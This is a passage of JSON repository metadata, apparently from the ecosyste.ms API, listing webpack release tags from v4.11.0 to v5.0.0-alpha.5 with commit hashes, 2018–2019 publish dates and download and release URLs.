ttps://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.4/manifests"},{"name":"v5.0.0-alpha.5","sha":"0d9ed482bc39fb23040ffd26823e0b7ed73320cb","kind":"tag","published_at":"2019-01-09T14:20:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.5","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.5/manifests"},{"name":"v5.0.0-alpha.4","sha":"b97bc4bc062cd5395de8b00115519472645d57d0","kind":"tag","published_at":"2019-01-08T14:09:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.4/manifests"},{"name":"v5.0.0-alpha.3","sha":"762155dc2da6795dfe72a5cbeb632fc42c9c49e0","kind":"tag","published_at":"2018-12-29T17:13:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.3/manifests"},{"name":"v4.28.3","sha":"983c2616ec1b869bfb659b6331bd2fe2abc66e23","kind":"tag","published_at":"2018-12-29T11:55:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.3/manifests"},{"name":"v5.0.0-alpha.2","sha":"88f0e18e64c7935723348de3b7dd1aa92050999c","kind":"tag","published_at":"2018-12-26T10:33:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.2/manifests"},{"name":"v5.0.0-alpha.1","sha":"90a0866efcd35401353c9e8d5c904fe2cd407f7e","kind":"tag","published_at":"2018-12-23T20:24:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.1/manifests"},{"name":"v4.28.2","sha":"fe514dd975f1d2dd1546906a6f4c0a6b2a0e3761","kind":"tag","published_at":"2018-12-22T12:53:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.2/manifests"},{"name":"v5.0.0-alpha.0","sha":"3f068c38610a1edfd6be2adf53a2dea44525cfde","kind":"tag","published_at":"2018-12-21T14:17:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.0/manifests"},{"name":"v4.28.1","sha":"7a6a71f1e9349f86833de12a673805621f0fc6f6","kind":"tag","published_at":"2018-12-20T17:10:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.1/manifests"},{"name":"v4.28.0","sha":"e871eeb121a69efd6cbfa56f977d5843bf030202","kind":"tag","published_at":"2018-12-19T10:37:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.0/manifests"},{"name":"v4.27.1","sha":"4056506488c1e071dfc9a0127daa61bf531170bf","kind":"tag","published_at":"2018-12-05T19:13:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.27.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.1/manifests"},{"name":"v4.27.0","sha":"f47bf8b64f9698cb05eff62832a04267823039cf","kind":"tag","published_at":"2018-12-04T09:31:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.27.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.0/manifests"},{"name":"v4.26.1","sha":"8e841feda3ef32c64df1a175d0d9f71e47cfbe8e","kind":"tag","published_at":"2018-11-25T20:25:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.26.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.1/manifests"},{"name":"v4.26.0","sha":"04f90c53eeae4817a9c515a0daca119d0decfa45","kind":"tag","published_at":"2018-11-19T08:39:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.26.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.0/manifests"},{"name":"v4.25.1","sha":"2361995a429794d372d61e3fb628dea3929e0ca4","kind":"tag","published_at":"2018-11-05T18:12:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.25.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.1/manifests"},{"name":"v4.25.0","sha":"290094e10a990aa3fd8073b02b4dc57781f924d7","kind":"tag","published_at":"2018-11-05T08:37:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.25.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.0/manifests"},{"name":"v4.24.0","sha":"9e397b5664dab3af0ceb2fa93cb5c539f02c023c","kind":"tag","published_at":"2018-11-02T12:11:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.24.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.24.0/manifests"},{"name":"v4.23.1","sha":"607cf70eddd213a690585276f7124963536781e7","kind":"tag","published_at":"2018-10-25T08:26:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.23.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.23.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.23.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.23.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.23.1/manifests"},{"name":"v4.23.0","sha":"a4feb6e15ff7ac19bab1a458de369a887dde44fe","kind":"tag","published_at":"2018-10-24T15:45:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.23.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.23.0/manifests"},{"name":"v4.22.0","sha":"894eca20bd678ca5473cfca28f332a7322c64b8e","kind":"tag","published_at":"2018-10-21T09:34:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.22.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.22.0/manifests"},{"name":"v4.21.0","sha":"432d2a3f174b08d5f4f7de018799c97a18efa1fd","kind":"tag","published_at":"2018-10-17T17:47:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.21.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.21.0/manifests"},{"name":"v4.20.2","sha":"5c5e902c8e89afeb51ad130f12a908b89d627fc5","kind":"tag","published_at":"2018-09-25T20:31:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.20.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.2/manifests"},{"name":"v4.20.1","sha":"91e9dd77062797e3e716485f295d32a5cab57042","kind":"tag","published_at":"2018-09-25T13:25:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.20.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.1/manifests"},{"name":"v4.20.0","sha":"c4d8a3c8d67239f6457fd7560d9bea14524ff4f0","kind":"tag","published_at":"2018-09-25T07:15:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.20.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.0/manifests"},{"name":"v4.19.1","sha":"b7121c15e1cc810ead6aa0f4b2aad4666c072257","kind":"tag","published_at":"2018-09-18T07:56:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.19.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.1/manifests"},{"name":"v4.19.0","sha":"6bf832398c3905e06300596caddb073c583d94c4","kind":"tag","published_at":"2018-09-13T22:04:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.19.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.0/manifests"},{"name":"v4.18.1","sha":"c51a1bab94e4ff8ffca443e4fcb038bc4911e65e","kind":"tag","published_at":"2018-09-13T10:22:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.18.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.1/manifests"},{"name":"v4.18.0","sha":"ee7d9485fa30d1d3d5adbfdfb52c8f57ae8b439e","kind":"tag","published_at":"2018-09-10T15:34:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.18.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.0/manifests"},{"name":"v4.17.3","sha":"ee27d36e7cb0bed3ca32911165bbf01fef993e48","kind":"tag","published_at":"2018-09-10T14:25:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.3/manifests"},{"name":"v4.17.2","sha":"dfe6379052598a00f13bfa4f34ac73856ddf3dd0","kind":"tag","published_at":"2018-09-03T17:25:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.2/manifests"},{"name":"v4.17.1","sha":"ff3ef5eb284ddcd3da8c3f5bef6318e873779ffe","kind":"tag","published_at":"2018-08-22T09:50:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.1/manifests"},{"name":"v4.17.0","sha":"6f1f18f84dee330ec582d4e9c075c47c9a732102","kind":"tag","published_at":"2018-08-21T08:42:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.0/manifests"},{"name":"v4.16.5","sha":"025338cc91a867768325120d325b341bdcdc4321","kind":"tag","published_at":"2018-08-06T07:13:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.5/manifests"},{"name":"v4.16.4","sha":"1e9d98cb4e52a6efc58f516aa7451d1faa6347ba","kind":"tag","published_at":"2018-08-02T13:46:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.4/manifests"},{"name":"v4.16.3","sha":"482ff200303e84a65bdd5c456ce232309a6ce450","kind":"tag","published_at":"2018-07-27T10:14:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.3/manifests"},{"name":"v4.16.2","sha":"0d4c87fcf261de02a6ecfb05faab235c5a2a92dc","kind":"tag","published_at":"2018-07-23T09:51:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.2/manifests"},{"name":"v4.16.1","sha":"fa02f3d03344913f0a02d29cb363581bc8535bef","kind":"tag","published_at":"2018-07-16T08:27:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.1/manifests"},{"name":"v4.16.0","sha":"18d33c630f799e99e5e43fc0b6931713dc976529","kind":"tag","published_at":"2018-07-11T08:45:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.0/manifests"},{"name":"v4.15.1","sha":"81149be5c1cd2a3ce70c3abcc179c5070fd6dd1c","kind":"tag","published_at":"2018-07-05T13:32:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.15.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.1/manifests"},{"name":"v4.15.0","sha":"bdd4442c449b41d2a0ea7ed0de9cded3ba0e2e31","kind":"tag","published_at":"2018-07-04T19:42:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.15.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.0/manifests"},{"name":"v4.14.0","sha":"190cf7b017c9d4106c83553a1de652e53452b095","kind":"tag","published_at":"2018-06-29T12:12:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.14.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.14.0/manifests"},{"name":"v4.13.0","sha":"e3678aa3767aaeb26ebcf5e3028412bbebdb4f9f","kind":"tag","published_at":"2018-06-28T15:34:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.13.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.13.0/manifests"},{"name":"v4.12.2","sha":"c384c3fb1c162667d001f467db05e73570ddd4d2","kind":"tag","published_at":"2018-06-27T05:39:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.12.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.2/manifests"},{"name":"v4.12.1","sha":"8a7597aa6eb2eef66a8f9db3a0c49bcb96022a94","kind":"tag","published_at":"2018-06-24T08:44:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.12.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.1/manifests"},{"name":"v4.12.0","sha":"02a955b4335cb7eeeb4dd1c96ef5407c6bcea158","kind":"tag","published_at":"2018-06-08T07:24:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.12.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.0/manifests"},{"name":"v4.11.1","sha":"956c0b12dcc274f5e5725fc5abc51f805d916f43","kind":"tag","published_at":"2018-06-06T07:02:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.11.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.1/manifests"},{"name":"v4.11.0","sha":"e2fe2009d9f2b26a8d751ea89e184d6ec96e37d7","kind":"tag","published_at":"2018-06-05T11:25:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.